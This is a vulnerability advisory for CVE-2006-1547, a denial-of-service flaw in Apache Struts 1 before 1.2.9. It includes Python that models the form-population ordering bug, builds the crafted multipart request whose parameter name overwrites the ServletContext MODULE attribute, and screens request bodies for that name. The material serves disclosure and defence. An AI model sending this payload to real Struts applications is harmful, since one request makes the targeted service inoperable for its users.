Overview
Apache Struts is a popular open-source web application framework for developing Java EE web applications. The version line affected here, Struts 1, has reached end of life, so fixes for it are no longer published by the project.
A denial-of-service vulnerability (CVE-2006-1547) has been identified in Apache Struts 1. An attacker can submit a request whose parameter names are crafted so that, while Struts populates an ActionForm, they overwrite objects the framework keeps in the ServletContext, leaving the application unable to serve requests.
Per CISA (America's Cyber Defense Agency), a denial-of-service attack occurs when legitimate users are unable to access information systems, devices, or other network resources due to the actions of a malicious cyber threat actor. Services affected may include email, websites, online accounts (e.g., banking), or other services that rely on the affected computer or network. A denial-of-service condition is commonly accomplished by flooding the targeted host or network with traffic until the target cannot respond or simply crashes, preventing access for legitimate users. DoS attacks can cost an organization both time and money while their resources and services are inaccessible. Note that this vulnerability needs no flood of traffic: a single crafted request is enough to put the application into the failed state described below.
This issue affects all versions of Struts before 1.2.9 when used with Apache Commons BeanUtils 1.7 or later.
Details
Module Info
- Product: Apache Struts
- Affected packages: struts, struts-core
- Affected versions: <1.2.9
- GitHub repository: https://github.com/apache/struts
- Package manager: Maven
- Fixed in: NES for Apache Struts Struts 1 v1.1.1
Vulnerability Info
ActionForms that handle multipart requests expose the MultipartRequestHandler through the form's getMultipartRequestHandler() method. This handler, in turn, provides access to the ActionServlet and, ultimately, the ServletContext. Struts populates an ActionForm with BeanUtils, whose property syntax lets a single parameter name walk nested properties ("a.b.c") and address mapped properties ("attribute(key)", which resolves to setAttribute(key, value)). By submitting request parameters with crafted names, an attacker could therefore set arbitrary attributes in the ServletContext during form population. For example, critical Struts configuration objects stored in the ServletContext could be replaced, rendering the application inoperable.
Starting with Struts 1.2.9, the MultipartRequestHandler is stored in the ActionForm only after form population has completed. As a result, the traversal now reaches a null handler during population, and BeanUtils aborts the attempt with a NestedNullException instead of writing to the ServletContext.
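The ordering change is the whole fix, so it helps to see it in isolation. The following is an added example, not code from the advisory or from Struts: the classes are constructed stand-ins for ServletContext, ActionServlet, MultipartRequestHandler and ActionForm, and set_property() imitates only the two BeanUtils path features the attack relies on, nested "a.b.c" traversal (a null intermediate bean raises NestedNullException) and mapped "name(key)" access (routed to setName(key, value)). The "<ModuleConfig>" placeholder stands for the configuration object Struts keeps under Globals.MODULE_KEY.

```python
"""Model of the CVE-2006-1547 form-population ordering bug (constructed)."""
import re

MODULE_KEY = "org.apache.struts.action.MODULE"   # Globals.MODULE_KEY in Struts 1
ATTACK_PARAM = (
    "multipartRequestHandler.servlet.servletContext.attribute(" + MODULE_KEY + ")"
)


class NestedNullException(Exception):
    """Stand-in for org.apache.commons.beanutils.NestedNullException."""


class ServletContext:
    def __init__(self):
        self._attrs = {MODULE_KEY: "<ModuleConfig>"}   # placeholder config object

    def getAttribute(self, key):
        return self._attrs.get(key)

    def setAttribute(self, key, value):
        self._attrs[key] = value


class ActionServlet:
    def __init__(self, ctx):
        self.servletContext = ctx


class MultipartRequestHandler:
    def __init__(self, servlet):
        self.servlet = servlet


class ActionForm:
    def __init__(self):
        self.multipartRequestHandler = None   # attached by Struts for multipart posts
        self.username = ""                    # an ordinary form property


def split_path(path):
    """Split on '.' outside parentheses: the mapped key itself contains dots."""
    segs, buf, depth = [], [], 0
    for ch in path:
        depth += (ch == "(") - (ch == ")")
        if ch == "." and depth == 0:
            segs.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    segs.append("".join(buf))
    return segs


_MAPPED = re.compile(r"^(\w+)\((.+)\)$")


def set_property(bean, path, value):
    """Walk the path the way BeanUtils.populate() does, then assign the last segment."""
    segs = split_path(path)
    for seg in segs[:-1]:
        if bean is None:
            raise NestedNullException(path)
        bean = getattr(bean, seg, None)       # BeanUtils would call the getter
    if bean is None:
        raise NestedNullException(path)
    m = _MAPPED.match(segs[-1])
    if m:                                     # mapped property -> setName(key, value)
        name, key = m.groups()
        getattr(bean, "set" + name[0].upper() + name[1:])(key, value)
    elif hasattr(bean, segs[-1]):             # simple property; unknown ones ignored
        setattr(bean, segs[-1], value)


def populate(form, params):
    for name, value in params.items():
        set_property(form, name, value)


def process_vulnerable(ctx, params):
    """Struts < 1.2.9: the handler is on the form while it is populated."""
    form = ActionForm()
    form.multipartRequestHandler = MultipartRequestHandler(ActionServlet(ctx))
    populate(form, params)
    return form


def process_fixed(ctx, params):
    """Struts 1.2.9: the handler is attached only after population finishes."""
    form = ActionForm()
    populate(form, params)
    form.multipartRequestHandler = MultipartRequestHandler(ActionServlet(ctx))
    return form


def module_after(processor, params):
    """Run one processor on a fresh context; return (MODULE attribute, error name)."""
    ctx = ServletContext()
    try:
        processor(ctx, params)
        err = None
    except NestedNullException as e:
        err = type(e).__name__
    return ctx.getAttribute(MODULE_KEY), err
```

With the vulnerable ordering, module_after(process_vulnerable, {ATTACK_PARAM: "junk"}) reports the MODULE attribute replaced by "junk"; with the fixed ordering the same parameters leave the attribute intact and the run ends in NestedNullException, which is exactly the behaviour the advisory describes for 1.2.9.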
Steps To Reproduce
On a vulnerable version of Struts, send a multipart/form-data request (the MultipartRequestHandler is only attached to the form for multipart requests) to an action that populates an ActionForm, including a parameter named multipartRequestHandler.servlet.servletContext.attribute(org.apache.struts.action.MODULE) with any text string as its value. The page will load successfully, but the application will no longer function properly. On a patched version of Struts, the application continues to operate normally after the same request.
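A request builder for that step, plus a check that screens multipart bodies for it, as an added example (not from the advisory or from Struts). Assumptions: the target URL, the boundary string and the benign field "username" are made up for a lab instance; the attack parameter name is the one given above. build_request() performs no network I/O, and param_names() is a minimal parser for the bodies built here, not a general multipart parser.

```python
"""Build the CVE-2006-1547 reproduction request and screen bodies for it (constructed)."""
import re
import urllib.request

ATTACK_PARAM = (
    "multipartRequestHandler.servlet.servletContext."
    "attribute(org.apache.struts.action.MODULE)"
)
BOUNDARY = "----cve20061547lab"   # assumption: any string absent from the field data


def build_multipart(fields, boundary=BOUNDARY):
    """Return (Content-Type value, body bytes) for a multipart/form-data POST.
    The request must be multipart: Struts only attaches a MultipartRequestHandler
    to the ActionForm for multipart/form-data requests."""
    lines = []
    for name, value in fields.items():
        lines += [f"--{boundary}",
                  f'Content-Disposition: form-data; name="{name}"',
                  "",
                  value]
    lines += [f"--{boundary}--", ""]
    return f"multipart/form-data; boundary={boundary}", "\r\n".join(lines).encode()


def build_request(url):
    """The advisory's reproduction step: one benign field plus the traversal
    parameter with an arbitrary string value. Send with urllib.request.urlopen()
    only against your own lab instance."""
    ctype, body = build_multipart({"username": "alice", ATTACK_PARAM: "broken"})
    return urllib.request.Request(url, data=body, method="POST",
                                  headers={"Content-Type": ctype})


def param_names(content_type, body):
    """Field names of a multipart body (minimal parser for bodies built above)."""
    boundary = content_type.split("boundary=", 1)[1].encode()
    names = []
    for part in body.split(b"--" + boundary):
        head = part.partition(b"\r\n\r\n")[0]
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            names.append(m.group(1).decode())
    return names


def traverses_handler(name):
    """True if a field name walks into the form's MultipartRequestHandler.
    No legitimate form field starts with that property, so a proxy or servlet
    filter can reject or alert on such names outright."""
    first = re.split(r"[.(]", name, maxsplit=1)[0]
    return first == "multipartRequestHandler"


def suspicious_fields(content_type, body):
    return [n for n in param_names(content_type, body) if traverses_handler(n)]
```

Running suspicious_fields() over the body that build_request() produces returns the single attack parameter name, while a body containing only "username" returns an empty list. The check is deliberately keyed on the first path segment rather than on the full attack string, so variants that reach a different ServletContext attribute through the same handler are still caught.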
Credit
- Bogdan Serban for responsibly reporting the issue
- Henri Yandell for the patch
Mitigation
Users of the affected components should apply one of the following mitigations:
- Upgrade to the patched version, Struts 1.2.9 or later
- Use a commercial support partner like HeroDevs for post-EOL security support.